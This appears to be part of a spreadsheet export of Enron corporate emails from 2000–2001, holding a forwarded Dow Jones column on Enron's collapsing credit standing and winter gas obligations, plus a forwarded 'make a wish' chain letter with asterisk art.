the message to such person), you may not copy or deliver this message to_x000D_
anyone._x000D_
In such case, you should destroy this message and kindly notify the sender_x000D_
by_x000D_
reply email. Please advise immediately if you or your employer does not_x000D_
consent_x000D_
to Internet email for messages of this kind.  Opinions, conclusions and_x000D_
other_x000D_
information in this message that do not relate to the official business of_x000D_
my_x000D_
firm shall be understood as neither given nor endorsed by it._x000D_
_x000D_
(See attached file: leopard.jpg)_x000D_
_x000D_
_x000D_
 - leopard.jpg _x000D_
</t>
  </si>
  <si>
    <t>Fri, 2 Nov 2001 13:59:03 -0800 (PST)</t>
  </si>
  <si>
    <t>One of the reasons I asked about traders' reluctance to deal with Enron is the article below questions our ability to deliver on winter gas.  I would like to prepare an answer in case anyone asks.  _x000D_
_x000D_
_x000D_
POWER POINTS: Time For A Bronx Miracle In Houston_x000D_
By Mark Golden_x000D_
_x000D_
11/02/2001_x000D_
Dow Jones Energy Service_x000D_
(Copyright (c) 2001, Dow Jones &amp; Company, Inc.)_x000D_
A Dow Jones Newswires Column _x000D_
_x000D_
NEW YORK -(Dow Jones)- With two outs in the bottom of the ninth and down by two runs with one man on, Enron Corp. (ENE) needs nothing less than a home run just to stay in the game._x000D_
This is the home run Enron must come up with: Full disclosure of the assets and liabilities of those troubled partnerships that have been kept off their balance sheet, and proof the corporation can cover the difference. It's what stockholders, bondholders and trading partners have been demanding, but time is running out, and Enron hasn't produced. _x000D_
"We're going to get to that number soon and tell people. We have to do that," said a source at Enron, who didn't know how quickly the disclosure would come or whether it would be independently audited. "In this environment, we are going to be absolutely sure that it's accurate." _x000D_
Enron has about $3.3 billion in debt on the two key partnerships payable in 2003. The company will sell the assets in those partnerships and, in a worse case scenario, will face a $1 billion shortfall that could be covered by selling stock and other company assets, Enron has said. The company hopes that when the time comes to issue new stock, shares will be trading closer to $20 than their current $11. _x000D_
Investors, however, aren't acting as if they're reassured. Part of the trouble, analysts with credit-rating firm Standard &amp; Poor's said Friday morning, is that until Enron sells the assets, nobody knows for sure what they're worth or how deep the partnerships are in the hole. _x000D_
S&amp;P is confident that Enron can raise enough capital to fill that hole, provided its trading partners in key energy markets continue to business with the company. _x000D_
Credit Derivative Fizzle _x000D_
_x000D_
To see the pickle the world's premier energy franchise is in, one needs to look no further than its credit derivatives trading desk. That relatively new and innovative operation was getting off the ground nicely, but the desk hasn't been able to transact for three weeks, since the value of Enron's stock and bonds began to plummet, according to another Enron employee. _x000D_
Enron didn't respond to a request for comment, but the Enron Credit division in Europe said in a release that lines are "constrained" as the market continues to evaluate the company's credit position. _x000D_
Until recently, customers would buy a credit derivative from Enron to cover its exposure to bankruptcy by a third company. A big supplier to a financially troubled company like Xerox Corp. (XRX) or Lucent Technologies (LU), for example, might pay Enron $1 million a year for a payout of, say, $10 million in the event of a bankruptcy. _x000D_
But you wouldn't pay the premium on your insurance unless you were sure that the insurance company could pay your claims. Likewise, with Enron's creditworthiness in doubt, there's no reason to pay a lot of money just to exchange Lucent risk for Enron risk. _x000D_
The same holds true, though less obviously, for Enron's core business of energy trading. Some utilities, large industrial companies and other energy trading companies could see their profits ruined if natural gas prices - already on the rise at $3 per million British thermal units - shoot to $10 this winter as they did last winter. _x000D_
To guard against that risk, companies buy contracts now for delivery this winter at set prices. If a company wants to lock in winter gas at $3, should it turn to Enron? If gas were to rise to $10 in January and Enron couldn't deliver, Enron's counterparty paid a good price for no protection. And if Enron failed in a $10 gas market, that would send hundreds of companies scrambling for supplies. Gas could go to $20 in a heartbeat. _x000D_
Leading Role An Asset _x000D_
_x000D_
Enron does have a man on base. The company is so important to energy market participants that they desperately want Enron to survive. And any company that moves to lock Enron out of the market now could regret doing so if Enron survives as the big dog. _x000D_
Enron's trading partners have a pretty consistent position at this point: They are continuing to trade with Enron, but are avoiding long-term deals that increase their exposure to the company. The only acceptable long-term deals are those that offset deals done earlier. Unless and until a bill goes unpaid, they'll keep delivering. _x000D_
Enron, like the rest of the U.S. energy industry, paid its bills for September gas deliveries on Oct. 20 and for its September electricity deliveries on Oct. 25. Its next power and gas bills come due in the third week of November. _x000D_
That means trading companies generally have just seven weeks of receivables at risk before Enron's creditworthiness faces another test. In exchange for taking on that small risk, they keep the great market maker in business. _x000D_
Lenders Show Concerns _x000D_
_x000D_
Lenders, whether through holding Enron bonds or providing loans, don't have the same luxury as energy trading companies that are keeping deals on a short leash. Lenders supply cash up front and for longer periods of time, usually years. _x000D_
Outside of long-term commitments, what worries the banks, which presumably got a good look at Enron's books? If Enron is now unable to make the big bets with long-term energy deals that have kept it profitable for years, can it service all of its liabilities, known and unknown? If it has to sell profitable assets like pipelines and power plants, or otherwise put those assets at risk, will lower earnings be enough to pay rising credit costs? What happens if its greatest asset - its traders - leave in droves to work elsewhere? _x000D_
If Enron is to have a chance, it needs energy trading profits to keep rolling in so that it can continue to service its debt. So far this year, trading and other wholesale operations have accounted for $2.2 billion out of $2.4 billion in net recurring income before interest and taxes. By comparison, Enron has made $617 million in interest payments so far this year. _x000D_
J.P. Morgan Chase &amp; Co. (JPM) and Citigroup Inc. (C) unit Salomon Smith Barney, at least, don't show much confidence Enron can do it. When they agreed to provide Enron with a $1 billion line of credit, they did so only after Enron posted valuable gas pipelines as collateral. _x000D_
Bond traders - the most sophisticated investors in the world - make their money by understanding the probabilities. They're trading Enron debt at levels typically associated with distressed companies. _x000D_
The lenders have chalked up their runs. Shareholders have ratcheted up the pressure. _x000D_
Enron, now, must step up to the plate. _x000D_
-By Mark Golden, Dow Jones Newswires; 201-938-4604; mark.golden@dowjones.com</t>
  </si>
  <si>
    <t>Thu, 7 Dec 2000 03:47:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'dana.davis@enron.com', 'lola.willis@enron.com', 'lesleycm@hotmail.com', 'erica.braden@enron.com'})</t>
  </si>
  <si>
    <t>FW: THIS IS SCARY!!! DO IT!!</t>
  </si>
  <si>
    <t>-----Original Message-----_x000D_
From: Sandy Lee_x000D_
Sent: Thursday, December 07, 2000 11:14 AM_x000D_
To: Annetta Harrison; Bill Lee (E-mail); Carol Lester (E-mail); Cindy_x000D_
Colston (E-mail); Glenna Bodeker (E-mail); Jerry Hart (E-mail); Judy_x000D_
Alsobrook (E-mail); Molly Laas-Sughrue (E-mail); Peggy Lee (E-mail);_x000D_
Valrie Chambers (E-mail); Wendy &amp; Bryan Monroe (E-mail); Bobby Jackson;_x000D_
Dianne Yarbrough; Elizabeth Andrews; Helen Boyd; Kay Garcia; Ruth_x000D_
Colburn_x000D_
Subject: FW: THIS IS SCARY!!! DO IT!!_x000D_
_x000D_
_x000D_
_x000D_
I hate these damn things!!_x000D_
_x000D_
_x000D_
&gt; Subject: Fwd: THIS IS SCARY!!! DO IT!!_x000D_
&gt;_x000D_
&gt; This Is  Scary!!_x000D_
&gt; The Phone Will  Ring Right After You Do This. . ._x000D_
&gt; Just read the little stories and make a wish._x000D_
&gt; Scroll all the  way to the bottom and there is a little message there_x000D_
&gt; -then do  it. No attachment on this one._x000D_
&gt;_x000D_
&gt; I'm 13 years old, and I wished that my dad would come home from the army,_x000D_
&gt; because he'd been having problems with his heart and right leg. It  was_x000D_
&gt; 2:53 p.m. that I'd made the wish.  At 3:07 p.m. (14 minutes later),  the_x000D_
&gt; doorbell rang, and there he was, luggage and all!!_x000D_
&gt;_x000D_
&gt; Katie_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; I'm 20 and I've  been having trouble in my job and on the verge of_x000D_
&gt; quitting._x000D_
&gt; I made a simple  wish that my boss would get a new job.  That was at 1:35_x000D_
&gt; and at 2:55 there was an announcement that he was promoted._x000D_
&gt;_x000D_
&gt; Lisa_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; Believe me...this really works!!  Just scroll down to the end, but while_x000D_
&gt; you do, make a wish.  Whatever age you are, is the number of minutes it_x000D_
&gt; will take for your wish to come true (ex. you are 15 years old, it will_x000D_
&gt; take 15 minutes for your wish to come true).  If you don't send this to_x000D_
&gt; people in 5  minutes, you will have bad luck for years!!_x000D_
&gt;_x000D_
&gt; Go!!!!!!_x000D_
&gt; *_x000D_
&gt; **_x000D_
&gt; ***_x000D_
&gt; ****_x000D_
&gt; *****_x000D_
&gt; ******_x000D_
&gt; *******_x000D_
&gt; ********_x000D_
&gt; *********_x000D_
&gt; **********_x000D_
&gt; ***********_x000D_
&gt; ************_x000D_
&gt; *************_x000D_
&gt; **************_x000D_
&gt; ***************_x000D_
&gt; ****************_x000D_
&gt; *****************_x000D_
&gt; ******************_x000D_
&gt; *******************_x000D_
&gt; ********************_x000D_
&gt; *********************_x000D_
&gt; **********************_x000D_
&gt; ***********************_x000D_
&gt; ************************_x000D_
&gt; *************************_x000D_
&gt; **************************_x000D_
&gt; ***************************_x000D_
&gt; ****************************_x000D_
&gt; *****************************_x000D_
&gt; ******************************_x000D_
&gt; *******************************_x000D_
&gt; ********************************_x000D_
&gt; *********************************_x000D_
&gt; **********************************_x000D_
&gt; ***********************************_x000D_
&gt; **********************************_x000D_
&gt; *********************************_x000D_
&gt; ********************************_x000D_
&gt; *******************************_x000D_
&gt; ******************************_x000D_
&gt; *****************************_x000D_
&gt; ****************************_x000D_
&gt; ***************************_x000D_
&gt; **************************_x000D_
&gt; *************************_x000D_
&gt; ************************_x000D_
&gt; ***********************_x000D_
&gt; **********************_x000D_
&gt; *********************_x000D_
&gt; ********************_x000D_
&gt; *******************_x000D_
&gt; ******************_x000D_
&gt; *****************_x000D_
&gt; ****************_x000D_
&gt; ***************_x000D_
&gt; **************_x000D_
&gt; *************_x000D_
&gt; ************_x000D_
&gt; ***********_x000D_
&gt; **********_x000D_
&gt; *********_x000D_
&gt; ********_x000D_
&gt; *******_x000D_
&gt; ******_x000D_
&gt; *****_x000D_
&gt; ****_x000D_
&gt; ***_x000D_
&gt; **_x000D_
&gt; *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_x000D_
&gt; &gt;***************************_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt; &gt;&gt; &gt; &gt;   &gt;_x000D_
&gt; &gt;****************************_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt; &gt;&gt; &gt; &gt;   &gt;_x000D_
&gt; &gt;*****************************_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt; &gt;&gt; &gt; &gt;   &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;******************************_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt; &gt;&gt; &gt; &gt;   &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;*******************************_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt; &gt;&gt; &gt; &gt;   &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;********************************_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt; &gt;&gt; &gt; &gt;   &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;*********************************_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt; &gt;&gt; &gt; &gt;   &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;**********************************_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt; &gt;&gt; &gt; &gt;   &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt;***********************************_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt; &gt;&gt; &gt; &gt;   &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;**********************************_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt; &gt;&gt; &gt; &gt;   &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;*********************************_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt; &gt;&gt; &gt; &gt;   &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;********************************_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt; &gt;&gt; &gt; &gt;   &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;*******************************_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt; &gt;&gt; &gt; &gt;   &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;******************************_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt; &gt;&gt; &gt; &gt;   &gt;_x000D_
&gt; &gt;*****************************_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt; &gt;&gt; &gt; &gt;   &gt;_x000D_
&gt; &gt;****************************_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt; &gt;&gt; &gt; &gt;   &gt;_x000D_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_x000D_
&gt; &gt;***************************_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt; &gt;&gt; &gt; &gt;   &gt;_x000D_
&gt; &gt;****************************_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt; &gt;&gt; &gt; &gt;   &gt;_x000D_
&gt; &gt;*****************************_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt; &gt;&gt; &gt; &gt;   &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;******************************_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt; &gt;&gt; &gt; &gt;   &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;*******************************_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt; &gt;&gt; &gt; &gt;   &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;********************************_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt; &gt;&gt; &gt; &gt;   &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;*********************************_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt; &gt;&gt; &gt; &gt;   &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;**********************************_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt; &gt;&gt; &gt; &gt;   &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt;***********************************_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt; &gt;&gt; &gt; &gt;   &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;**********************************_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt; &gt;&gt; &gt; &gt;   &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;*********************************_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt; &gt;&gt; &gt; &gt;   &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;********************************_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt; &gt;&gt; &gt; &gt;   &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;*******************************_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt; &gt;&gt; &gt; &gt;   &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;******************************_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt; &gt;&gt; &gt; &gt;   &gt;_x000D_
&gt; &gt;*****************************_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt; &gt;&gt; &gt; &gt;   &gt;_x000D_
&gt; &gt;****************************_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt; &gt;&gt; &gt; &gt;   &gt;_x000D_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_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt; &gt;&gt; &gt; &gt;   &gt;  &gt;STOP!!!!!!!!_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt; &gt;&gt; &gt; &gt;   &gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt; &gt;&gt; &gt; &gt;   &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;Congratulations!!!!!!!!!!!!!!!!!_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt; &gt;&gt; &gt; &gt;   &gt; &gt;Your wish will  now come_x000D_
&gt; true in your_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;age_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; minutes!!_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt; &gt;&gt; &gt; &gt;   &gt; &gt;Now follow this_x000D_
&gt; carefully.... it can be very rewarding!!!!  If you send this to 10 more_x000D_
&gt; people, other than the 5 that you already have to send to, something major_x000D_
&gt; that you've been wanting will happen  ._x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt;_x000D_
&gt; &gt;&gt;&gt;&gt;_x000D_
&gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;___________________________________________________________________x000D_
&gt; ___x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt;______x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt; &gt;&gt; &gt; &gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt; &gt;&gt; &gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt; &gt;&gt; &gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt; &gt;&gt; &gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt; &gt;&gt; &gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt; &gt;&gt; &gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt; &gt;&gt; &gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt; &gt;&gt; &gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt; &gt;&gt; &gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt; &gt;&gt; &gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt; &gt;&gt; &gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt; &gt;&gt; &gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt; &gt;&gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt; &gt;&gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt; &gt;&gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt; &gt;&gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt; &gt;&gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt;_x000D_
